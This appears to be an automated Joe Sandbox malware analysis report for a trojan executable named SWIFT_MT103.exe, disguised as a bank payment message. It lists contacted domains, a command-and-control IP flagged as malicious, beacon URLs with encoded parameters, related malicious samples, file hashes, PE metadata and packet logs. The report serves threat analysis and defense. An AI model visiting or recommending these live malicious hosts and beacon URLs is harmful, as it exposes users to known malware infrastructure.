                            		unknown
                            http://www.jiyu-kobo.co.jp/Y0SWIFT_MT103.exe, 00000000.00000003.206953988.0000000005916000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fonts.comSWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                              		high
                              http://www.sandoll.co.krSWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.urwpp.deDPleaseSWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.zhongyicts.com.cnSWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.sakkal.comSWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com.TTFSWIFT_MT103.exe, 00000000.00000003.209514147.0000000005916000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.apache.org/licenses/LICENSE-2.0SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                                		high
                                http://www.fontbureau.comSWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.galapagosdesign.com/SWIFT_MT103.exe, 00000000.00000003.210711299.0000000005917000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://www.fayansistanbul.com/q4kr/?4h_4=eOXhpEoLIa7YYnf6/8HRqFDyWrundll32.exe, 00000015.00000002.470872978.0000000004A82000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/MSWIFT_MT103.exe, 00000000.00000003.207158126.0000000005916000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.comR.TTFrSWIFT_MT103.exe, 00000000.00000003.209514147.0000000005916000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.comVSWIFT_MT103.exe, 00000000.00000003.209514147.0000000005916000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/jp/rSWIFT_MT103.exe, 00000000.00000003.206953988.0000000005916000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/DSWIFT_MT103.exe, 00000000.00000003.206953988.0000000005916000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/jp/SWIFT_MT103.exe, 00000000.00000003.206953988.0000000005916000.00000004.00000001.sdmp, SWIFT_MT103.exe, 00000000.00000003.207158126.0000000005916000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.comaSWIFT_MT103.exe, 00000000.00000003.209514147.0000000005916000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.carterandcone.comlSWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cn/SWIFT_MT103.exe, 00000000.00000003.204932376.0000000005914000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/cabarga.htmlNSWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.fontbureau.comiSWIFT_MT103.exe, 00000000.00000003.209514147.0000000005916000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/o4SWIFT_MT103.exe, 00000000.00000003.206953988.0000000005916000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.founder.com.cn/cnSWIFT_MT103.exe, 00000000.00000003.204967901.0000000005914000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/frere-jones.htmlSWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.fontbureau.com/designers/cabarga.htmlSWIFT_MT103.exe, 00000000.00000003.209480927.000000000594D000.00000004.00000001.sdmp, SWIFT_MT103.exe, 00000000.00000003.209448002.000000000594D000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.fontbureau.comtSWIFT_MT103.exe, 00000000.00000003.288558730.0000000005910000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.commSWIFT_MT103.exe, 00000000.00000003.209736302.0000000005916000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.jiyu-kobo.co.jp/SWIFT_MT103.exe, 00000000.00000003.206953988.0000000005916000.00000004.00000001.sdmp, SWIFT_MT103.exe, 00000000.00000003.207158126.0000000005916000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.comoSWIFT_MT103.exe, 00000000.00000003.288558730.0000000005910000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.jiyu-kobo.co.jp/iSWIFT_MT103.exe, 00000000.00000003.207158126.0000000005916000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers8SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.jiyu-kobo.co.jp/hSWIFT_MT103.exe, 00000000.00000003.206691885.0000000005916000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.comalsSWIFT_MT103.exe, 00000000.00000003.209736302.0000000005916000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/vnoiSWIFT_MT103.exe, 00000000.00000003.206691885.0000000005916000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/_SWIFT_MT103.exe, 00000000.00000003.206691885.0000000005916000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          155.133.142.5
                                          		webacc3.sd6.ghst.netFrance
                                          		203476GANDI-AS-2Domainnameregistrar-httpwwwgandinetFRtrue

                                          General Information

                                          Joe Sandbox Version:33.0.0 White Diamond
                                          Analysis ID:458843
                                          Start date:03.08.2021
                                          Start time:19:41:37
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 10m 21s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:SWIFT_MT103.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:26
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@7/1@4/1
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 59.9% (good quality ratio 54.3%)
                                          • Quality average: 72.6%
                                          • Quality standard deviation: 31.4%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                          • Excluded IPs from analysis (whitelisted): 104.43.193.48, 52.255.188.83, 13.64.90.137, 20.82.210.154, 23.211.4.86, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211
                                          • Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/458843/sample/SWIFT_MT103.exe

                                          Simulations

                                          Behavior and APIs

                                          No simulations

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          155.133.142.5Payment_Advice000987.exeGet hashmaliciousBrowse
                                          • www.garagekuhn.com/q4kr/?zJEPD=4hMXovbxmz&-ZalKtr=CWCBar0ajh7IOPyGoiQ+OSxuK1fv7pOEcpev3lNBz5ExpQMJFIwPX0r3WtdZztc5D/uY
                                          PI.exeGet hashmaliciousBrowse
                                          • www.garagekuhn.com/q4kr/?p6A=CWCBar0ajh7IOPyGoiQ+OSxuK1fv7pOEcpev3lNBz5ExpQMJFIwPX0r3WtdZztc5D/uY&UDK0fp=0FQt7
                                          Payment_Advice.exeGet hashmaliciousBrowse
                                          • www.garagekuhn.com/q4kr/?QtRl=CWCBar0ajh7IOPyGoiQ+OSxuK1fv7pOEcpev3lNBz5ExpQMJFIwPX0r3WtdZztc5D/uY&w2MLb=6lux

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          webacc3.sd6.ghst.netPayment_Advice000987.exeGet hashmaliciousBrowse
                                          • 155.133.142.5
                                          PI.exeGet hashmaliciousBrowse
                                          • 155.133.142.5
                                          payment_copy.exeGet hashmaliciousBrowse
                                          • 155.133.142.5
                                          000987654345XASD.exeGet hashmaliciousBrowse
                                          • 155.133.142.5
                                          Payment_Advice.exeGet hashmaliciousBrowse
                                          • 155.133.142.5
                                          www.fayansistanbul.comPayment_Advice.exeGet hashmaliciousBrowse
                                          • 104.21.3.157
                                          PI_OIUYT0987654456.exeGet hashmaliciousBrowse
                                          • 172.67.130.233
                                          www.josiemaxwrites.comMX-M502N_201145.exeGet hashmaliciousBrowse
                                          • 199.34.228.67
                                          PI_OIUYT0987654456.exeGet hashmaliciousBrowse
                                          • 199.34.228.67
                                          000987654345XASD.exeGet hashmaliciousBrowse
                                          • 199.34.228.67

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          GANDI-AS-2Domainnameregistrar-httpwwwgandinetFRPayment_Advice000987.exeGet hashmaliciousBrowse
                                          • 155.133.142.5
                                          GYrZTFjj6s.exeGet hashmaliciousBrowse
                                          • 155.133.130.88
                                          ZU3hkQYpMr.exeGet hashmaliciousBrowse
                                          • 155.133.130.88
                                          5DmHH1SVTr.exeGet hashmaliciousBrowse
                                          • 155.133.130.88
                                          PI.exeGet hashmaliciousBrowse
                                          • 155.133.142.5
                                          fS5DVkL6jm.exeGet hashmaliciousBrowse
                                          • 155.133.138.10
                                          VSP-88D-Neo1-F YX20210315086 KSAI21061536.xlsxGet hashmaliciousBrowse
                                          • 155.133.138.10
                                          a8eC6O6okf.exeGet hashmaliciousBrowse
                                          • 155.133.138.10
                                          Payment_Advice.exeGet hashmaliciousBrowse
                                          • 155.133.142.5
                                          $RAULIU9.exeGet hashmaliciousBrowse
                                          • 155.133.142.13
                                          h8lD4SWL35.exeGet hashmaliciousBrowse
                                          • 155.133.132.7
                                          iWlLtgXNf8.xlsGet hashmaliciousBrowse
                                          • 155.133.132.7
                                          iWlLtgXNf8.xlsGet hashmaliciousBrowse
                                          • 155.133.132.7
                                          iWlLtgXNf8.xlsGet hashmaliciousBrowse
                                          • 155.133.132.7
                                          BL_SHIPMENT CI509808730.exeGet hashmaliciousBrowse
                                          • 155.133.138.3
                                          tS9P6wPz9x.exeGet hashmaliciousBrowse
                                          • 155.133.142.13
                                          ransomware.exeGet hashmaliciousBrowse
                                          • 155.133.142.13
                                          ransomware.exeGet hashmaliciousBrowse
                                          • 155.133.142.13
                                          ZRz0Aq1Rf0.dllGet hashmaliciousBrowse
                                          • 155.133.142.13
                                          6VEoBuy32f.xlsGet hashmaliciousBrowse
                                          • 155.133.132.7

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SWIFT_MT103.exe.log
                                          Process:C:\Users\user\Desktop\SWIFT_MT103.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.355304211458859
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                          MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                          SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                          SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                          SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                          Malicious:true
                                          Reputation:high, very likely benign file
                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.823048609176136
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Windows Screen Saver (13104/52) 0.07%
                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                          File name:SWIFT_MT103.exe
                                          File size:735744
                                          MD5:b54e7fb4262c31a414b6dbcb49a5d800
                                          SHA1:060dbdd923a63f4c782afe0d252bbc2e2585d255
                                          SHA256:6c282c90bf6e72212f3c2038601a503d9e9e36bb417687fc8b16362fe854fa3d
                                          SHA512:efe8474e2a54f76634c812a87a64c664da9e5c1fe1f6d08a95176ef7dd0d8cdd3f1e9ed49cea07885b2ebda0edcdf7e6cc494dbae109d9e5bd6fb408e0698bbf
                                          SSDEEP:12288:VqnBrep+gczyhNSvRbBQHR4qz91hI0zSaNsvz+yuWDVId21NaI+E8tyvXkXRbWHu:VqlYX8Y9KpuYu4mTFORYwcX/b
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..0...........O... ...`....@.. ....................................@................................

                                          File Icon

                                          Icon Hash:00828e8e8686b000

                                          Static PE Info

                                          General

                                          Entrypoint:0x4b4f92
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                          Time Stamp:0x9CA2CF99 [Thu Apr 10 16:34:33 2053 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:v4.0.30319
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [edi], bh
                                          pop esp
                                          pop dword ptr [edx]
                                          aas
                                          add byte ptr [eax], al
                                          cmp byte ptr [edi], 00000000h
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          aas
                                          add byte ptr [eax], al
                                          cmp byte ptr [edi], 00000000h
                                          add byte ptr [eax+0000003Fh], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb4f400x4f.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xb60000x5c4.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xb80000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xb4f240x1c.text
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000xb2fb80xb3000False0.902687456355data7.83042762199IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rsrc0xb60000x5c40x600False0.42578125data4.13458372963IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0xb80000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_VERSION0xb60900x334data
                                          RT_MANIFEST0xb63d40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Version Infos

                                          DescriptionData
                                          Translation0x0000 0x04b0
                                          LegalCopyrightCopyright 2019
                                          Assembly Version1.0.0.0
                                          InternalNamec5ryJ02.exe
                                          FileVersion1.0.0.0
                                          CompanyName
                                          LegalTrademarks
                                          Comments
                                          ProductNameCustomTabControl
                                          ProductVersion1.0.0.0
                                          FileDescriptionCustomTabControl
                                          OriginalFilenamec5ryJ02.exe

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Aug 3, 2021 19:44:15.912106037 CEST4974480192.168.2.3155.133.142.5
                                          Aug 3, 2021 19:44:15.948527098 CEST8049744155.133.142.5192.168.2.3
                                          Aug 3, 2021 19:44:15.948710918 CEST4974480192.168.2.3155.133.142.5
                                          Aug 3, 2021 19:44:15.948903084 CEST4974480192.168.2.3155.133.142.5
                                          Aug 3, 2021 19:44:15.985213041 CEST8049744155.133.142.5192.168.2.3
                                          Aug 3, 2021 19:44:15.985829115 CEST8049744155.133.142.5192.168.2.3
                                          Aug 3, 2021 19:44:15.986007929 CEST4974480192.168.2.3155.133.142.5
                                          Aug 3, 2021 19:44:15.986087084 CEST4974480192.168.2.3155.133.142.5
                                          Aug 3, 2021 19:44:16.022443056 CEST8049744155.133.142.5192.168.2.3

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Aug 3, 2021 19:42:18.516814947 CEST5598453192.168.2.38.8.8.8
                                          Aug 3, 2021 19:42:18.541495085 CEST53559848.8.8.8192.168.2.3
                                          Aug 3, 2021 19:42:19.353925943 CEST6418553192.168.2.38.8.8.8
                                          Aug 3, 2021 19:42:19.387394905 CEST53641858.8.8.8192.168.2.3
                                          Aug 3, 2021 19:42:20.021723986 CEST6511053192.168.2.38.8.8.8
                                          Aug 3, 2021 19:42:20.047612906 CEST53651108.8.8.8192.168.2.3
                                          Aug 3, 2021 19:42:20.828769922 CEST5836153192.168.2.38.8.8.8
                                          Aug 3, 2021 19:42:20.853826046 CEST53583618.8.8.8192.168.2.3
                                          Aug 3, 2021 19:42:21.619060040 CEST6349253192.168.2.38.8.8.8
                                          Aug 3, 2021 19:42:21.645261049 CEST53634928.8.8.8192.168.2.3
                                          Aug 3, 2021 19:42:22.355950117 CEST6083153192.168.2.38.8.8.8
                                          Aug 3, 2021 19:42:22.380911112 CEST53608318.8.8.8192.168.2.3
                                          Aug 3, 2021 19:42:23.261084080 CEST6010053192.168.2.38.8.8.8
                                          Aug 3, 2021 19:42:23.287834883 CEST53601008.8.8.8192.168.2.3
                                          Aug 3, 2021 19:42:24.102617979 CEST5319553192.168.2.38.8.8.8
                                          Aug 3, 2021 19:42:24.128243923 CEST53531958.8.8.8192.168.2.3
                                          Aug 3, 2021 19:42:26.898149967 CEST5014153192.168.2.38.8.8.8
                                          Aug 3, 2021 19:42:26.933640003 CEST53501418.8.8.8192.168.2.3
                                          Aug 3, 2021 19:42:27.752101898 CEST5302353192.168.2.38.8.8.8
                                          Aug 3, 2021 19:42:27.787461996 CEST53530238.8.8.8192.168.2.3
                                          Aug 3, 2021 19:42:28.602740049 CEST4956353192.168.2.38.8.8.8
                                          Aug 3, 2021 19:42:28.630064964 CEST53495638.8.8.8192.168.2.3
                                          Aug 3, 2021 19:42:29.425945997 CEST5135253192.168.2.38.8.8.8
                                          Aug 3, 2021 19:42:29.453385115 CEST53513528.8.8.8192.168.2.3
                                          Aug 3, 2021 19:42:30.485573053 CEST5934953192.168.2.38.8.8.8
                                          Aug 3, 2021 19:42:30.512403965 CEST53593498.8.8.8192.168.2.3
                                          Aug 3, 2021 19:42:31.150413990 CEST5708453192.168.2.38.8.8.8
                                          Aug 3, 2021 19:42:31.175445080 CEST53570848.8.8.8192.168.2.3
                                          Aug 3, 2021 19:42:31.850492001 CEST5882353192.168.2.38.8.8.8
                                          Aug 3, 2021 19:42:31.885777950 CEST53588238.8.8.8192.168.2.3
                                          Aug 3, 2021 19:42:32.947462082 CEST5756853192.168.2.38.8.8.8
                                          Aug 3, 2021 19:42:32.975351095 CEST53575688.8.8.8192.168.2.3
                                          Aug 3, 2021 19:42:33.716245890 CEST5054053192.168.2.38.8.8.8
                                          Aug 3, 2021 19:42:33.744640112 CEST53505408.8.8.8192.168.2.3
                                          Aug 3, 2021 19:42:50.226778030 CEST5436653192.168.2.38.8.8.8
                                          Aug 3, 2021 19:42:50.273755074 CEST53543668.8.8.8192.168.2.3
                                          Aug 3, 2021 19:42:57.276568890 CEST5303453192.168.2.38.8.8.8
                                          Aug 3, 2021 19:42:57.312922955 CEST53530348.8.8.8192.168.2.3
                                          Aug 3, 2021 19:43:13.954231024 CEST5776253192.168.2.38.8.8.8
                                          Aug 3, 2021 19:43:14.007452011 CEST53577628.8.8.8192.168.2.3
                                          Aug 3, 2021 19:43:14.571547031 CEST5543553192.168.2.38.8.8.8
                                          Aug 3, 2021 19:43:14.621414900 CEST53554358.8.8.8192.168.2.3
                                          Aug 3, 2021 19:43:15.729789972 CEST5071353192.168.2.38.8.8.8
                                          Aug 3, 2021 19:43:15.763592958 CEST53507138.8.8.8192.168.2.3
                                          Aug 3, 2021 19:43:16.355693102 CEST5613253192.168.2.38.8.8.8
                                          Aug 3, 2021 19:43:16.361042976 CEST5898753192.168.2.38.8.8.8
                                          Aug 3, 2021 19:43:16.389719963 CEST53561328.8.8.8192.168.2.3
